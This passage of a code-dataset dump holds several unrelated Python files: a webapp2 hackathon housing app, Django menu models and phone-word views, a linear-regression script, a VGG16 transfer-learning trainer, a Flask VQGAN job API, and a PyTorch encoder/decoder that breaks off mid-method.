\n \t''' + extra_text)\n hackathon_name = self.request.get('hackathon_name',\n DEFAULT_HACKATHON_NAME)\n\n # Ancestor Queries, as shown here, are strongly consistent\n # with the High Replication Datastore. Queries that span\n # entity groups are eventually consistent. If we omitted the\n # ancestor from this query there would be a slight chance that\n # Availability that had just been written would not show up in a\n # query.\n #availabilities_query = Availability.query(\n ## ancestor=hackathon_key(hackathon_name))#.order(-Availability.date)\n #availabilities_query = availabilities_query.filter(Availability.deleted==False)\n #availabilities = availabilities_query.fetch()\n\n\n for availability in availabilities:\n #'''if greeting.author:\n # author = greeting.author.email\n # if user and user.user_id() == greeting.author.identity:\n # author += ' (You)'\n # self.response.write('%s wrote:' % author)\n #else:\n # self.response.write('An anonymous person wrote:')'''\n\n self.response.write('''\n
\n \t

\n

Preferred Genders: %s | Cost: %s
\n \t

\n
\n
\n Message: %s\n
\n

Remove

\n
\n
\n\n \t
''' %\n (availability.gender, availability.cost, cgi.escape(availability.content), availability.uID))\n\n self.response.write('''
\n \t
\n \t\t
\n \t
\n ''')\n\n\n\n\n self.response.write('''\n \n ''')\n\n #for availability in availabilities:\n # self.response.write('
Message: %s
Preferred Genders: %s
Cost: %s
' %\n # (cgi.escape(availability.content), availability.gender, availability.cost))\n # self.response.write(\"

Remove

\" % availability.uID)\n\n #self.response.write('')\n\n#class CaptchaPage(webapp2.RequestHandler):\n# def get(self):\n\nclass Login(webapp2.RequestHandler):\n def get(self):\n user = users.get_current_user()\n if user:\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n self.redirect(url)\n else:\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login'\n self.redirect(url)\n\n##NONEED\nclass DeleteAvailability(webapp2.RequestHandler):\n def get(self):\n key = self.request.get('key')\n\n availabilities_query = Availability.query().filter(Availability.uID==key)\n\n for a in availabilities_query:\n a.deleted=True\n a.put()\n\n self.redirect('/profile')\n\n##UPDATED\nclass MainPage(webapp2.RequestHandler):\n def get(self):\n\n user = users.get_current_user()\n emailString = \"\"\n if user:\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n\n else:\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login'\n emailString = \"Please log in to view contact details\"\n\n self.response.write('''\n \n \n \n \n sleephacks - accomodation\n\n \n \n \n \n \n \n \t\n \n
\n \t \n
\n
\n
\n \t''')\n hackathon_name = self.request.get('hackathon_name',\n DEFAULT_HACKATHON_NAME)\n\n # Ancestor Queries, as shown here, are strongly consistent\n # with the High Replication Datastore. Queries that span\n # entity groups are eventually consistent. If we omitted the\n # ancestor from this query there would be a slight chance that\n # Availability that had just been written would not show up in a\n # query.\n availabilities_query = Availability.query(\n ancestor=hackathon_key(hackathon_name))#.order(-Availability.date)\n availabilities_query = availabilities_query.filter(Availability.deleted==False)\n availabilities = availabilities_query.fetch()\n\n\n for availability in availabilities:\n if user:\n emailString = availability.attendee.email\n #'''if greeting.author:\n # author = greeting.author.email\n # if user and user.user_id() == greeting.author.identity:\n # author += ' (You)'\n # self.response.write('%s wrote:' % author)\n #else:\n # self.response.write('An anonymous person wrote:')'''\n\n self.response.write('''\t
\n \t

\n
\n Preferred Genders: %s | Cost: %s\n \t

\n
\n

\n Message: %s\n

\n Contact:\n
\n %s\n
\n
\n\n \t
''' %\n (availability.gender, availability.cost, cgi.escape(availability.content), emailString))\n\n self.response.write('''
\n \t
\n \t\t
\n \t
\n
\n
''')\n\n # Write the submission form and the footer of the page\n sign_query_params = urllib.urlencode({'hackathon_name':\n hackathon_name})\n if user:\n self.response.write(MAIN_PAGE_FOOTER_TEMPLATE % (sign_query_params))\n else:\n self.response.write('''

Host a Hacker


Please log in to post a listing

''')\n\n self.response.write('''
\n
\n\n \n ''')\n#class HackathonLandingPage(webapp2.RequestHandler):\n# def post(self):\n\n##UPDATED\nclass HomePage(webapp2.RequestHandler):\n def get(self):\n user = users.get_current_user()\n browseText = \"\"\n if user:\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n browseText = 'Browse Hackathons'\n else:\n #self.redirect('/login')\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login with Google'\n self.response.write(HOMEPAGE % (url, url_linktext, browseText, INTRO))\n\n##NONEED\nclass ContentEngine(webapp2.RequestHandler):\n def post(self):\n # We set the same parent key on the 'Availability' to ensure each\n # Availability is in the same entity group. Queries across the\n # single entity group will be consistent. However, the write\n # rate to a single entity group should be limited to\n # ~1/second.\n hackathon_name = self.request.get('hackathon_name',\n DEFAULT_HACKATHON_NAME)\n greeting = Availability(parent=hackathon_key(hackathon_name))\n\n if users.get_current_user():\n greeting.attendee = Attendee(\n identity=users.get_current_user().user_id(),\n email=users.get_current_user().email())\n\n greeting.content = self.request.get('content')\n greeting.cost = self.request.get('cost')\n greeting.gender = self.request.get('gender')\n greeting.deleted = False\n greeting.uID = hackathon_name + users.get_current_user().email()\n id = greeting.put()\n\n\n\n query_params = {'hackathon_name': hackathon_name}\n self.redirect('/hackathon?' + urllib.urlencode(query_params))\n\napp = webapp2.WSGIApplication([\n ('/login', Login),\n ('/hackathon', MainPage),\n ('/listing', HackathonPage),\n ('/', HomePage),\n ('/profile', UserDashboard),\n ('/delete', DeleteAvailability),\n ('/update', ContentEngine),\n], debug=True)\n","sub_path":"guestbook.py","file_name":"guestbook.py","file_ext":"py","file_size_in_byte":21669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"146009295","text":"from django.db import models\nfrom django.core.urlresolvers import reverse, NoReverseMatch\n\n\nclass Menu(models.Model):\n name = models.CharField('Название меню', max_length=50,\n null=True, blank=True, unique=True)\n\n def __str__(self):\n return self.name\n\n\nclass Item(models.Model):\n name = models.CharField('Название пункта меню', max_length=100,\n null=True, blank=True)\n address = models.TextField('URL', null=True, blank=True)\n parent = models.ForeignKey('self', verbose_name='Родитель',\n null=True, blank=True, related_name='child')\n clear_address = models.TextField('Чистый URL', null=True, blank=True)\n lord_menu = models.ForeignKey('Menu', verbose_name='Меню', null=True,\n blank=True, related_name='my_lord')\n path = models.TextField('Путь к пункту', null=True, blank=True)\n\n class Meta:\n verbose_name = 'Пункт меню'\n verbose_name_plural = 'Пункты меню'\n\n def __str__(self):\n return self.name\n\n def save(self):\n super(Item, self).save()\n if self.parent:\n if self.parent.path:\n parent_path = self.parent.path\n else:\n parent_path = ''\n else:\n parent_path = ''\n self.path = str(parent_path) + ' ' + str(self.id)\n try:\n named_url = self.address.split()[0]\n arguments = [item for item in self.address.split()[1:]]\n self.clear_address = reverse(named_url, args=arguments)\n except NoReverseMatch:\n self.clear_address = self.address\n super(Item, self).save()\n\n def string_id(self):\n return 
str(self.id)\n","sub_path":"test_menu/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"125897874","text":"import pandas as pd\r\n\r\n# read the csv file using pandas -->\r\nreadDATA=pd.read_csv(\"Box_Office.csv\")\r\n\r\n# split the feature and label columns into NDArrays -->\r\ndays=readDATA.iloc[:, 0:1].values\r\nmoneyBahubali_Dangal=readDATA.iloc[:, 1:3].values\r\n\r\n# import the LinearRegression class -->\r\nfrom sklearn.linear_model import LinearRegression\r\nobj=LinearRegression()\r\n# model training -->\r\nobj.fit(days, moneyBahubali_Dangal)\r\n\r\nday=10\r\n\r\n# collection earned on day 10 --->\r\n\r\nCollection=obj.predict([[day]])\r\n\r\nbahubaliMoney, dangalMoney=Collection[0]\r\n\r\nif bahubaliMoney > dangalMoney:\r\n    print(\"BAHUBALI 2 MONEY > DANGAL MONEY\")\r\nelse:\r\n    print(\"DANGAL MONEY > BAHUBALI 2 MONEY\")\r\n","sub_path":"day35.py","file_name":"day35.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"167326521","text":"import logging\nimport os.path\n\n# Django decorators\nfrom django.views.decorators import csrf\n# Settings\nfrom django.conf import settings\n\n# Local stuff\nfrom wp_main.utilities import responses\nfrom apps.phonewords import phone_words, pwtools\n\nfrom apps.models import wp_app\nlog = logging.getLogger('wp.apps.phonewords.views')\n\ntry:\n    phonewordsapp = wp_app.objects.get(alias='phonewords')\n    app_version = phonewordsapp.version\nexcept Exception as ex:\n    log.error('Phonewords has no database entry!\\n'\n              'Version will be incorrect:\\n{}'.format(ex))\n    app_version = '1.0.0'\n\n\n@csrf.csrf_protect\ndef view_index(request):\n    \"\"\" Main view for phone words. \"\"\"\n\n    reqargs = responses.get_request_args(request)\n    if reqargs:\n        # This request came with args, send it to view_results()\n        return view_results(request, args=reqargs)\n    else:\n        # Basic index view.\n        context = {\n            'version': app_version,\n            'hasargs': False,\n        }\n        return responses.clean_response(\n            'phonewords/index.html',\n            context=context,\n            request=request)\n\n\n@csrf.csrf_protect\ndef view_results(request, args=None):\n    \"\"\" Process number/word given by request args. 
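# --- Editor's note (illustrative addition, not part of the original record): a minimal
# sketch of the named-URL resolution used by Item.save() in the test_menu record above.
# The address string and the resulting path are hypothetical example values.
#     named_url = "article-detail 42".split()[0]         # -> "article-detail"
#     arguments = "article-detail 42".split()[1:]        # -> ["42"]
#     try:
#         clear_address = reverse(named_url, args=arguments)   # e.g. "/articles/42/"
#     except NoReverseMatch:
#         clear_address = "article-detail 42"            # fall back to the raw value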
\"\"\"\n\n errors = None\n results = None\n total = None\n rawquery = args['query']\n if not rawquery:\n return responses.error404(request, msgs=('Invalid url args.', ))\n\n lookupfunc, query, method = get_lookup_func(rawquery)\n cache_used = False\n # Try cached results first (for numbers only)\n if method == 'number':\n cachedresult = pwtools.lookup_results(query)\n if cachedresult:\n cache_used = True\n log.debug('Using cached result: {}'.format(cachedresult))\n total = cachedresult.attempts\n results = pwtools.get_results(cachedresult)\n if results:\n # Cancel lookup, we have cached results.\n lookupfunc = None\n\n else:\n log.debug('No cached found for: {}'.format(query))\n\n if lookupfunc:\n # Get wp words file.\n wordfile = os.path.join(\n settings.BASE_DIR,\n 'apps/phonewords/words'\n )\n if os.path.isfile(wordfile):\n # Get results.\n try:\n rawresults = lookupfunc(query, wordfile=wordfile)\n except ValueError as exval:\n errors = exval\n except Exception as ex:\n log.error('Error looking up number: {}\\n{}'.format(query, ex))\n errors = ex\n else:\n # Good results, fix them.\n try:\n results, total = fix_results(rawresults)\n except Exception as ex:\n log.error('Error fixing results:\\n{}'.format(ex))\n errmsg = (\n 'Sorry, there was an error parsing the results.
{}'\n )\n errors = Exception(errmsg.format(ex))\n # Cache these results for later if its a number.\n if method == 'number' and (not cache_used):\n pwtools.save_results(query, results, total)\n else:\n log.error('missing word file: {}'.format(wordfile))\n errors = Exception('Can\\'t find word file!')\n\n # Return response.\n context = {\n 'version': app_version,\n 'hasargs': True,\n 'query': args['query'],\n 'results': results,\n 'errors': errors,\n 'total': total,\n }\n\n return responses.clean_response(\n 'phonewords/index.html',\n context=context,\n request=request)\n\n\ndef fix_results(results):\n \"\"\" Fixes results from phone_words.get_phonenumber and\n phone_words.get_phonewords so they return the same types.\n \"\"\"\n\n if isinstance(results, dict):\n # Phonenumber results, only returns one thing.\n return results, 1\n elif isinstance(results, (list, tuple)):\n # Phonewords results, ({number: word}, totalcount)\n return results[0], results[1]\n else:\n # Shouldn't get here.\n return results, 0\n\n\ndef get_lookup_cmd(query):\n \"\"\" Determines cmdline args needed to run phonewords,\n uses -r if a word was given, and normal if a number was given.\n \"\"\"\n\n if query and ('-' in query):\n query = query.replace('-', '')\n\n lookupmethod = get_lookup_method(query)\n if lookupmethod:\n argmap = {'word': [query, '-r', '-p'],\n 'number': [query, '-p'],\n }\n return argmap.get(lookupmethod, None), query, lookupmethod\n # no lookup args for that query.\n return None, query, lookupmethod\n\n\ndef get_lookup_func(query):\n \"\"\" Determines if this is a word or number lookup,\n returns the proper function.\n If no query is given, returns None.\n \"\"\"\n if query and ('-' in query):\n query = query.replace('-', '')\n\n lookupmethod = get_lookup_method(query)\n if lookupmethod:\n funcmap = {'word': phone_words.get_phonenumber,\n 'number': phone_words.get_phonewords,\n }\n return funcmap.get(lookupmethod, None), query, lookupmethod\n # no lookup method for that query\n return None, query, lookupmethod\n\n\ndef get_lookup_method(query):\n \"\"\" Get lookup args depending query type (number or word)\n Returns 'number', 'word', or None (for bad-query)\n \"\"\"\n # Trim characters from query.\n if query:\n query = query.replace('-', '').strip()\n\n querytype = None\n # Still have query after trimming, determine method.\n if query:\n try:\n intval = int(query)\n query = str(intval)\n except ValueError:\n querytype = 'word'\n else:\n querytype = 'number'\n\n return querytype\n","sub_path":"apps/phonewords/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"441808577","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.tensorboard import SummaryWriter\n\nimport torchvision\nfrom torchvision import transforms\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nimport cv2\nimport os\nimport tqdm as tq\nimport scipy.io\n\n\ndef read_annotation_file(file_path):\n f = open(file_path, \"r\")\n data = f.read()\n data = data.split('\\n')\n x_min = int(data[18].split('<')[1].split('>')[1])\n y_min = int(data[19].split('<')[1].split('>')[1])\n x_max = int(data[20].split('<')[1].split('>')[1])\n y_max = int(data[21].split('<')[1].split('>')[1])\n return x_min, y_min, x_max, y_max\n\n\n# paths\npath_to_save_results_ephoc = 'runs/exp31_SGD_ep_bz_128'\npath_to_save_results_batch = 
'runs/exp31_SGD_bt_bz_128'\npath_data_set = './data_set'\npath_images_data = os.path.join(path_data_set, 'Images')\npath_annotation = os.path.join(path_data_set, 'Annotation')\npath_test_list = os.path.join(path_data_set, 'test_list.mat')\npath_train_list = os.path.join(path_data_set, 'train_list.mat')\n\n# read test and train lists\ntest_list = scipy.io.loadmat(path_test_list)\ntrain_list = scipy.io.loadmat(path_train_list)\n\n# remove unnesscery keys\nto_remove = ['__header__', '__version__', '__globals__']\nfor rem in to_remove:\n test_list.pop(rem)\n train_list.pop(rem)\n\n# reduce dims for dataFrame\nfor key in test_list.keys():\n test_list[key] = np.squeeze(test_list[key])\n train_list[key] = np.squeeze(train_list[key])\n\n# create dataFrames for tests and lists\ntest_data_table = pd.DataFrame(data=test_list)\ntrain_data_table = pd.DataFrame(data=train_list)\n\n# add full paths to ims\ntest_data_table['file_list'] = test_data_table['file_list'].apply(lambda x: os.path.join(path_images_data, x.item()))\ntrain_data_table['file_list'] = train_data_table['file_list'].apply(lambda x: os.path.join(path_images_data, x.item()))\n\n# add full paths to annotation\ntest_data_table['annotation_list'] = test_data_table['annotation_list'].apply(lambda x: os.path.join(path_annotation, x.item()))\ntrain_data_table['annotation_list'] = train_data_table['annotation_list'].apply(lambda x: os.path.join(path_annotation, x.item()))\n\n# convert labels to start from 0\ntest_data_table['labels'] = test_data_table['labels'].apply(lambda x: x - 1)\ntrain_data_table['labels'] = train_data_table['labels'].apply(lambda x: x - 1)\n\n# shuffle the data\ntest_data_table = test_data_table.sample(frac=1)\ntrain_data_table = train_data_table.sample(frac=1)\n\ntransform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\nwriter_e = SummaryWriter(log_dir=path_to_save_results_ephoc)\nwriter_b = SummaryWriter(log_dir=path_to_save_results_batch)\n\ndata_train = []\nlabels_train = []\ndata_test = []\nlabels_test = []\n\nfor i in tq.tqdm(test_data_table.index):\n annotation_path = test_data_table['annotation_list'][i]\n x_min, y_min, x_max, y_max = read_annotation_file(annotation_path)\n\n im_path = test_data_table['file_list'][i]\n frame = cv2.imread(im_path)\n frame = frame[y_min:y_max, x_min:x_max, :]\n frame = cv2.resize(frame, (224, 224), interpolation=cv2.INTER_AREA)\n frame = transform(frame)\n data_test.append(frame)\n\n label = test_data_table['labels'][i]\n labels_test.append(torch.tensor(label))\n\nfor i in tq.tqdm(train_data_table.index):\n annotation_path = train_data_table['annotation_list'][i]\n x_min, y_min, x_max, y_max = read_annotation_file(annotation_path)\n\n im_path = train_data_table['file_list'][i]\n frame = cv2.imread(im_path)\n frame = frame[y_min:y_max, x_min:x_max, :]\n frame = cv2.resize(frame, (224, 224), interpolation=cv2.INTER_AREA)\n frame = transform(frame)\n data_train.append(frame)\n\n label = train_data_table['labels'][i]\n labels_train.append(torch.tensor(label))\n\ndata_test = torch.stack(data_test)\nlabels_test = torch.stack(labels_test)\ndata_train = torch.stack(data_train)\nlabels_train = torch.stack(labels_train)\n\nmodel = torchvision.models.vgg16(pretrained=True)\nin_featurs = model.classifier[6].in_features\nmodel.classifier[6] = nn.Linear(in_features=in_featurs, out_features=120, bias=True)\n\n# Hyper Parameters\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda:0\" if use_cuda else \"cpu\")\nmodel = 
model.to(device)\n\nEPHOC = 40\nlr = 0.01\nbz = 128\nloss_fn = nn.CrossEntropyLoss()\noptim = torch.optim.SGD(model.parameters(), lr=lr)\n\nlen_data_train = len(data_train)\nlen_data_test = len(data_test)\n\ntrain_num_of_batches = len_data_train//bz\ntest_num_of_batches = len_data_test//bz\n\nloss_train_list = []\nacc_train_list = []\nloss_test_list = []\nacc_test_list = []\n\nfor ephoc in range(EPHOC):\n temp_loss_train_list = []\n temp_acc_train_list = []\n temp_loss_test_list = []\n temp_acc_test_list = []\n\n for i in tq.tqdm(range(train_num_of_batches + 1)):\n if i == train_num_of_batches:\n if not (i * bz == len(data_train)):\n in_data = data_train[i*bz:]\n lab = labels_train[i*bz:]\n else:\n in_data = data_train[i * bz:(i + 1)*bz]\n lab = labels_train[i * bz:(i + 1) * bz]\n\n in_data = in_data.to(device)\n lab = lab.to(device)\n\n pred = model(in_data)\n loss = loss_fn(pred, lab)\n\n optim.zero_grad()\n loss.backward()\n optim.step()\n\n output_class = torch.argmax(pred, dim=1)\n acc = torch.mean((lab.to(device) == output_class).type(torch.float32))\n\n temp_loss_train_list.append(loss.to(\"cpu\").item())\n temp_acc_train_list.append(acc.to(\"cpu\").item())\n\n writer_b.add_scalar('Loss/train', temp_loss_train_list[-1])\n writer_b.add_scalar('Accuracy/train', temp_acc_train_list[-1])\n\n with torch.no_grad():\n for i in tq.tqdm(range(test_num_of_batches + 1)):\n if i == test_num_of_batches:\n if not(i*bz == len(data_test)):\n in_data = data_test[i * bz:]\n lab = labels_test[i * bz:]\n else:\n in_data = data_test[i * bz:(i + 1) * bz]\n lab = labels_test[i * bz:(i + 1) * bz]\n in_data = in_data.to(device)\n lab = lab.to(device)\n\n pred = model(in_data)\n loss = loss_fn(pred, lab)\n\n output_class = torch.argmax(pred, dim=1)\n acc = torch.mean((lab.to(device) == output_class).type(torch.float32))\n\n temp_loss_test_list.append(loss.to(\"cpu\").item())\n temp_acc_test_list.append(acc.to(\"cpu\").item())\n\n writer_b.add_scalar('Loss/test', temp_loss_test_list[-1])\n writer_b.add_scalar('Accuracy/test', temp_acc_test_list[-1])\n\n loss_train_list.append(np.mean(temp_loss_train_list))\n acc_train_list.append(np.mean(temp_acc_train_list))\n loss_test_list.append(np.mean(temp_loss_test_list))\n acc_test_list.append(np.mean(temp_acc_test_list))\n\n writer_e.add_scalar('Loss/train', np.mean(temp_loss_train_list), ephoc)\n writer_e.add_scalar('Accuracy/train', np.mean(temp_acc_train_list), ephoc)\n writer_e.add_scalar('Loss/test', np.mean(temp_loss_test_list), ephoc)\n writer_e.add_scalar('Accuracy/test', np.mean(temp_acc_test_list), ephoc)\n\n print(\"Ephoc {}: train_loss - {}, test_loss - {}, train_acc - {}, test_acc - {}\".format(ephoc,\n loss_train_list[-1],\n loss_test_list[-1],\n acc_train_list[-1],\n acc_test_list[-1]))\nwriter_b.flush()\nwriter_b.close()\nwriter_e.flush()\nwriter_e.close()\n","sub_path":"transfer_learningV2_cuda0.py","file_name":"transfer_learningV2_cuda0.py","file_ext":"py","file_size_in_byte":7852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"77945166","text":"from datetime import datetime\nimport uuid\n\nfrom flask import Blueprint, request, redirect, url_for\nfrom envcfg.raw import aws as aws_cfg\n\nfrom starks.modules.alimt.service import zh2en\nfrom starks.modules.vqgan.helper import get_random_style\nfrom starks.modules.vqgan.model.vqgan import VQGAN\nfrom starks.modules.vqgan.model.vqgan_job import VQGANJob\nfrom starks.utils.api import success, fail\nfrom starks.utils.s3 import sign_get_url\n\n\nbp = 
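# --- Editor's note (illustrative addition, not part of the original record): the
# transfer-learning record above batches tensors by manual slicing with an explicit
# last-short-batch branch. A common alternative (a sketch, not the author's code) is
# TensorDataset + DataLoader, which handles the final short batch automatically:
#     from torch.utils.data import TensorDataset, DataLoader
#     train_loader = DataLoader(TensorDataset(data_train, labels_train),
#                               batch_size=128, shuffle=True)
#     for in_data, lab in train_loader:
#         ...  # same forward/backward steps as in the loop above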
Blueprint(\"vqgan\", __name__, url_prefix=\"/api/v1\")\nAWS_BUCKET_NAME = aws_cfg.BUCKET_NAME\nMAX_PAGE_SIZE = 50\n\nVQGAN_IMAGE = \"413195515848.dkr.ecr.cn-northwest-1.amazonaws.com.cn/surreal-vqgan-clip:latest\", # noqa: FIXME\n\n\n@bp.route(\"/paint.list\")\ndef list_vqgans():\n page = request.args.get(\"page\", type=int, default=1)\n page_size = request.args.get(\"page_size\", type=int, default=10)\n page = max(1, page)\n page_size = min(page_size, MAX_PAGE_SIZE)\n vqgans = VQGAN.paginate(page, page_size)\n return success([e.marshal() for e in vqgans.items])\n\n\n@bp.route(\"/paint.get\")\ndef get_vqgan():\n id_ = request.args.get(\"id\")\n if id is None:\n return fail(error=\"Paint not found\", status=404)\n\n vqgan = VQGAN.query.get(id_)\n if vqgan is None:\n return fail(error=\"Paint not found\", status=404)\n return success(vqgan.marshal())\n\n\n@bp.route(\"/paint.preview\")\ndef preview_vqgan():\n id_ = request.args.get(\"id\", type=int)\n vqgan = VQGAN.get(id_)\n if vqgan is None:\n return fail(error=\"Job not found\", status=404)\n return redirect(\n sign_get_url(\n obj_key=vqgan.obj_key,\n bucket_name=vqgan.bucket_name,\n )\n )\n\n\n@bp.route(\"/paint.create\", methods=[\"POST\"])\ndef create_paint():\n payload = request.get_json()\n raw_text = payload.get(\"text\", None)\n if raw_text is None:\n return fail(error=\"text can not be empty\", status=400)\n\n raw_text = raw_text.strip()\n\n if len(raw_text) == 0 or len(raw_text) > 90:\n return fail(error=\"text too long\", status=400)\n\n text = zh2en(raw_text)\n today = datetime.now().strftime(\"%Y%m%d\")\n hex_ = uuid.uuid4().hex\n\n vqgan_job = VQGANJob.create(\n params={\n \"nonce\": hex_,\n \"date\": today,\n \"raw_text\": raw_text,\n \"text\": text,\n \"style\": get_random_style(),\n \"docker\": {\n \"image\": VQGAN_IMAGE,\n }\n }\n )\n return success(vqgan_job.marshal())\n\n\n@bp.route(\"/paint-job.report\", methods=[\"POST\"])\ndef report_job():\n payload = request.get_json()\n job_id = payload.get(\"job_id\", None)\n job_type = payload.get(\"task_type\", None)\n status = payload.get(\"status\", None)\n timestamp = payload.get(\"timestamp\", None)\n data = payload.get(\"data\", None)\n if job_type.lower() != \"vqgan\":\n return fail(error=\"Invalid job_type\")\n\n job = VQGANJob.get_by_id(job_id)\n if job is None:\n return fail(error=\"Job not found\", status=404)\n\n if status == \"started\":\n job.status = VQGANJob.STATUS_IN_PROGRESS\n job.started_at = datetime.fromtimestamp(int(timestamp/1000))\n job.save()\n return success({\"job_id\": job_id})\n\n if status == \"stopped\":\n job.status = VQGANJob.STATUS_ERROR\n job.set_result(is_success=False, error_message=data.get(\"message\"))\n job.ended_at = datetime.utcnow()\n job.save()\n return success({\"job_id\": job_id})\n\n if status == \"success\":\n job.status = VQGANJob.STATUS_SUCCESS\n job.set_result(is_success=True, data=data)\n job.ended_at = datetime.utcnow()\n job.save()\n\n vqgan = VQGAN.create(\n text=job.params[\"raw_text\"],\n bucket_name=AWS_BUCKET_NAME,\n obj_key=job.result.get(\"data\", {}).get(\"obj_key\")\n )\n\n return success({})\n\n return fail(error='Bad Request')\n\n\n@bp.route(\"/paint-job.get\")\ndef get_job():\n job_id = request.args.get(\"id\")\n job = VQGANJob.get_by_id(job_id)\n if job is None:\n return fail(error=\"Job not found\", status=404)\n return success({\n \"status\": job.status,\n \"result\": job.result,\n \"preview_url\": url_for(\n 'vqgan.get_job_preview', job_id=job_id, _external=True),\n })\n\n\n@bp.route(\"/paint-job.create\", 
methods=[\"POST\"])\ndef create_job():\n payload = request.get_json()\n raw_text = payload.get(\"text\", None)\n if raw_text is None:\n return fail(error=\"text can not be empty\", status=400)\n\n raw_text = raw_text.strip()\n\n if len(raw_text) == 0 or len(raw_text) > 90:\n return fail(error=\"text too long\", status=400)\n\n text = zh2en(raw_text)\n today = datetime.now().strftime(\"%Y%m%d\")\n hex_ = uuid.uuid4().hex\n\n vqgan_job = VQGANJob.create(\n params={\n \"nonce\": hex_,\n \"date\": today,\n \"raw_text\": raw_text,\n \"text\": text,\n \"style\": get_random_style(),\n \"docker\": {\n \"image\": VQGAN_IMAGE,\n }\n }\n )\n return success(vqgan_job.marshal())\n\n\n@bp.route(\"/paint-jobs.preview\")\ndef get_job_preview(job_id):\n job_id = request.args.get(\"job_id\", type=int)\n job = VQGANJob.get_by_id(job_id)\n if job is None:\n return fail(error=\"Job not found\", status=404)\n data = job.result.get(\"data\", {})\n return redirect(\n sign_get_url(\n obj_key=data.get(\"filekey\"),\n bucket_name=AWS_BUCKET_NAME,\n )\n )\n","sub_path":"starks/modules/vqgan/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"523387648","text":"from __future__ import division\nimport torch\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision import models\n\n# general libs\nimport numpy as np\nimport math\nfrom torch import optim\nimport warnings\nimport os\nfrom utils.utils import *\nimport torch\nprint('Propagation Network: initialising')\n\n\nclass Encoder(nn.Module):\n def __init__(self, opt):\n super(Encoder, self).__init__()\n self.opt = opt\n # clicks(2) & binary mask\n self.conv1_clicks = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=True) \n # previous round frame, ab space\n self.conv1_prev = nn.Conv2d(2, 64, kernel_size=7, stride=2, padding=3, bias=True)\n # grayscale\n self.conv1_gray = nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=True)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight.data, nonlinearity='relu')\n if m.bias is not None:\n nn.init.normal_(m.bias.data)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.kaiming_normal_(m.weight.data, nonlinearity='relu')\n m.bias.data.zero_()\n\n resnet = models.resnet50(pretrained=True)\n self.bn1 = resnet.bn1\n self.relu = resnet.relu # 1/2, 64\n self.maxpool = resnet.maxpool\n\n self.res2 = resnet.layer1 # 1/4, 256\n self.res3 = resnet.layer2 # 1/8, 512\n self.res4 = resnet.layer3 # 1/16, 1024\n self.res5 = resnet.layer4 # 1/32, 2048\n\n def forward(self, gray, clicks):\n x = self.conv1_gray(gray) + self.conv1_clicks(clicks)\n x = self.bn1(x)\n x = self.relu(x) # 1/2, 64\n x = self.maxpool(x) # 1/4, 64\n r2 = self.res2(x) # 1/4, 64\n r3 = self.res3(r2) # 1/8, 128 \n r4 = self.res4(r3) # 1/16, 256\n r5 = self.res5(r4) # 1/32, 512\n\n return r5, r4, r3, r2\n\n\nclass ResBlock(nn.Module):\n def __init__(self, indim, outdim=None):\n super(ResBlock, self).__init__()\n if outdim == None:\n outdim = indim\n if indim == outdim:\n self.downsample = None\n else:\n self.downsample = nn.Conv2d(indim, outdim, kernel_size=3, padding=1)\n\n self.conv1 = nn.Conv2d(indim, outdim, kernel_size=3, padding=1)\n self.conv2 = nn.Conv2d(outdim, outdim, kernel_size=3, padding=1)\n\n def forward(self, x):\n r = self.conv1(F.relu(x))\n r = self.conv2(F.relu(r))\n\n if self.downsample is not None:\n x = self.downsample(x)\n \n return x + r \n\n\nclass 
\nclass Refine(nn.Module):\n    def __init__(self, inplanes, planes, scale_factor=2):\n        super(Refine, self).__init__()\n        self.ResFS = ResBlock(inplanes, planes)\n        self.ResMM = ResBlock(planes, planes)\n        self.scale_factor = scale_factor\n\n    def forward(self, f, pm):\n        s = self.ResFS(f)\n        m = s + F.interpolate(pm, scale_factor=self.scale_factor, mode='bilinear')\n        m = self.ResMM(m)\n        return m\n\n\nclass Decoder(nn.Module):\n    def __init__(self, mdim, opt):\n        super(Decoder, self).__init__()\n        self.opt = opt\n        self.ResFM = ResBlock(2048, mdim)\n        self.RF4 = Refine(1024, mdim) # 1/16 -> 1/8\n        self.RF3 = Refine(512, mdim) # 1/8 -> 1/4\n        self.RF2 = Refine(256, mdim) # 1/4 -> 1\n        self.pred1 = nn.Conv2d(mdim, 529, kernel_size=(1,1), padding=(0, 0), stride=1)\n        self.pred2 = nn.Conv2d(mdim, 2, kernel_size=(3,3), padding=(1,1), stride=1)\n        self.tanh = nn.Tanh()\n        \n        for m in self.modules():\n            if isinstance(m, nn.Conv2d):\n                nn.init.kaiming_normal_(m.weight.data, nonlinearity='relu')\n                if m.bias is not None:\n                    nn.init.normal_(m.bias.data)\n            elif isinstance(m, nn.BatchNorm2d):\n                nn.init.kaiming_normal_(m.weight.data, nonlinearity='relu')\n                m.bias.data.zero_()\n\n    def forward(self, r5, r4, r3, r2):\n        x = self.ResFM(r5)\n        x = self.RF4(r4, x) # out: 1/16, 256\n        x = 